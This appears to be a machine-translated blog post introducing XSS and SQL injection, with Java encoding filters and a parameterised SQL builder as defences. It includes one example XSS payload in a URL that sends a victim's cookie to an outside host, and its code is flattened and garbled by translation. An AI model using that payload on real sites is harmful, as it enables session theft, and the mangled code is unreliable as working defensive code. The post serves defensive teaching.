The knowledge of web security is very weak, this article to the XSS cross-site attack and SQL injection related knowledge, I hope you have a lot of advice.
For the prevention of SQL injection, I only used simple concatenation of string injection and parametric query, can say that there is no good experience, in order to avoid after the understanding of the guilty of making a big mistake, a special reference to a lot of predecessors of the experience, a small sum, welcome everyone to shoot bricks ah
One, cross-site scripting attacks (XSS)
The principle of cross-site scripting attacks
The XSS is also called the CSS (cross site script), which is an attack by the site. It refers to a malicious attacker inserting malicious script code into a Web page, and the program does not filter the user input, and when the user browses to the page, the script code embedded inside the Web is executed to achieve the special purpose of the malicious attacker.
The dangers of cross-site scripting attacks: stealing cookies, putting worms, phishing ...
The classification of cross-site scripting attacks are: storage-type XSS, reflective XSS, Dom-type XSS
An XSS vulnerability is one of the most common vulnerabilities in Web applications. If your site does not have a fixed method for preventing XSS vulnerabilities, then there is an XSS vulnerability. The importance of this virus with XSS vulnerabilities is that it is often difficult to see the threat of an XSS vulnerability, and the virus takes it to its fullest.
XSS Work Flow
1) Malicious users, in some common areas (for example, the proposal to submit a form or message Common Board input form) to enter some text, the text is seen by other users, but these text is not only the text they want to enter, but also includes some scripts that can be executed on the client. such as: http://xxx.xxx.com.cn/intf/_photos.jsp?callback=<script>window.location.href= "http://www.baidu.com?a=" + Escape (Document.cookie) </script>, Parameters <script>xxx</script> If this is not escaped, a script2 is embedded in the page) Maliciously submit this form 3) other users see this page that includes a malicious script and execute it to obtain sensitive information such as a user's cookie.
The following situation, the request to jump to Baidu, and the query to the value of the cookie is also displayed
Results will result in:
For more detailed information on the principles of XSS, please refer to the Danale "small tank" in the park. XSS for web security testing
So how do we defend against XSS?
One way is to filter the required parameters before a form submission or URL parameter is passed, see the following XSS filtering tool class code
Import java.net.urlencoder;/** * Filter Illegal characters Tool class * */public class Encodefilter {//filter most HTML characters public static String Encod E (String input) {if (input = = null) {return input; } StringBuilder sb = new StringBuilder (Input.length ()); for (int i = 0, c = input.length (), I < C; i++) {Char ch = input.charat (i); Switch (CH) {case ' & ': Sb.append ("&"); Break Case ' < ': Sb.append ("<"); Break Case ' > ': Sb.append (">"); Break Case ' "': Sb.append (" " "); Break Case ' \ ': Sb.append ("& #x27;"); Break Case '/': Sb.append ("& #x2F;"); Break Default:sb.append (CH); }} return sb.tostring (); }//js-Side filter public static string Encodeforjs (String INPUT) {if (input = = null) {return input; } StringBuilder sb = new StringBuilder (Input.length ()); for (int i = 0, c = input.length (), I < C; i++) {Char ch = input.charat (i); Do not encode alphanumeric characters and ', '. ' ' _ ' if (ch >= ' a ' && ch <= ' z ' | | ch >= ' a ' && ch <= ' Z ' | | Ch >= ' 0 ' && ch <= ' 9 ' | | ch = = ', ' | | ch = = '. ' | | ch = = ' _ ') {sb.append (CH); } else {String temp = integer.tohexstring (CH); Encode with \\xHH if (Ch < n) {sb.append (' \ \ '). Append (' x '); if (temp.length () = = 1) {sb.append (' 0 '); } sb.append (Temp.tolowercase ()); Otherwise encode with \\uHHHH} else {sb.append (' \ \ '). append (' u '); for (int j = 0, D = 4-temp.length (); J < D; j + +) {sb.append (' 0 '); } sb.append (Temp.touppercase ()); }}} return Sb.tostring (); }/** * CSS illegal character filtering * http://www.w3.org/TR/CSS21/syndata.html#escaped-characters * */public static String en CODEFORCSS (String input) {if (input = = null) {return input; } StringBuilder sb = new StringBuilder (Input.length ()); for (int i = 0, c = input.length (), I < C; i++) {Char ch = input.charat (i); Check for alphanumeric characters if (ch >= ' a ' && ch <= ' z ' | | ch >= ' a ' && ch < ; = ' Z ' | | Ch >= ' 0 ' && ch <= ' 9 ') {sb.append (CH); } else {//return the hex and end in whitespace to terminate sb.append (' \ \ '). Append (INteger.tohexstring (CH)). Append ("); }} return sb.tostring (); }/** * URL parameter code * http://en.wikipedia.org/wiki/Percent-encoding
*/public static string encodeURIComponent (string input) {return encodeuricomponent (input, "utf-8"); public static string encodeURIComponent (string input, string encoding) {if (input = = null) {retur n input; The String result; try {result = Urlencoder.encode (input, encoding); } catch (Exception e) {result = ""; } return result; public static Boolean Isvalidurl (String input) {if (input = = NULL | | input.length () < 8) {Retu RN false; } Char ch0 = Input.charat (0); if (Ch0 = = ' h ') {if (Input.charat (1) = = ' t ' && input.charat (2) = = ' t ' && Input.charat (3) = = ' P ') {char CH4 = Input.charat (4); if (CH4 = = ': ') {if (Input.charat (5) = = '/' && input.charat (6) = = '/') {RETurn Isvalidurlchar (input, 7); } else {return false; }} else if (CH4 = = ' s ') {if (Input.charat (5) = = ': ' && Input.charat (6) = = '/' && input.charat (7) = = '/') {return Isvalidur Lchar (input, 8); } else {return false; }} else {return false; }} else {return false; }} else if (Ch0 = = ' F ') {if (Input.charat (1) = = ' t ' && Input.charat (2) = = ' P ' && input.charat (3) = = ': ' && input.charat (4) = = '/' && Input.charat (5) = = '/') {return Isvalidurlchar (input, 6); } else {return false; }} return false; } Static Boolean Isvalidurlchar (String url, int start) {for (int i = start, c = url.length (); i < C; i + +) { char ch = url.charat (i); if (ch = = ' "' | | ch = = ' \ ') {return false; }} return true; }}
There are a lot of bug records about XSS error, such as http://www.wooyun.org/bugs/wooyun-2010-016779
SQL Injection Vulnerability
The principle of SQL injection attack:
Use the user input parameters to cobble together SQL query statements, allowing the user to control SQL query statements. For more information on SQL injection, please refer to: SQL Injection Defense Introduction
Defense methods
- Using precompiled statements,
- Binding variables
- Using a secure stored procedure
- Check data type
- Using Security functions
Recommended method: Do not use stitched SQL, use placeholders, such as using JdbcTemplate,
Here's a workaround: Replace the appearance of the splicing SQL with the following functions
Import Java.util.arraylist;import java.util.hashmap;import Java.util.list;import Java.util.map;public class Sqlbuilder {protected StringBuilder sqlbuf = new StringBuilder (); Protected list<object> values = new arraylist<object> (); Protected Map<string, object> parammap = new hashmap<string, object> (); Public sqlbuilder appendsql (String sql) {sqlbuf.append (SQL); return this; } public Sqlbuilder Appendvalue (Object value) {sqlbuf.append ('? '); Values.add (value); return this; } public Sqlbuilder appendvalues (object[] values) {sqlbuf.append ('); for (int i = 0, c = values.length; i < C; ++i) {sqlbuf.append ('? '). Append (', '); This.values.add (Values[i]); } int last = Sqlbuf.length ()-1; if (Last > 0 && sqlbuf.charat (last) = = ', ') {Sqlbuf.setcharat (last, ') '); } return this; } public Sqlbuilder AppendeQparam (String param, Object value) {sqlbuf.append (param). Append ("=:"). Append (param); Parammap.put (param, value); return this; Public Sqlbuilder Appendltparam (String param, Object value) {sqlbuf.append (param). Append ("<:"). Appen D (PARAM); Parammap.put (param, value); return this; Public Sqlbuilder Appendgtparam (String param, Object value) {sqlbuf.append (param). Append (">:"). Appen D (PARAM); Parammap.put (param, value); return this; Public Sqlbuilder Appendinparam (String param, Object ... values) {if (values = = null) {return This } sqlbuf.append (param). Append ("in ("); int len = values.length; for (int i = 0; i < len; i++) {if (I! = 0) {sqlbuf.append (","); } sqlbuf.append (":"). Append (param). append (i); Parammap.put (Param+i, values[i]); } sqlbuf.append (")"); return this; Sqlbuilder Appendlikeparam (String param, Object value) {sqlbuf.append (param). Append ("like:"). App End (param); Parammap.put (param, "%" +value+ "%"); return this; } public String GetSQL () {return sqlbuf.tostring (); } public object[] GetValues () {return Values.toarray (); } public map<string, Object> Getparammap () {return parammap; }}
The above two vulnerabilities are often encountered for web development, in addition to denial of service attack vulnerability, cross-site request forgery (CSRF), open redirect vulnerability, and so on, and then slowly learn!!!
Web security: XSS Vulnerability and SQL Injection Vulnerability Introduction and solutions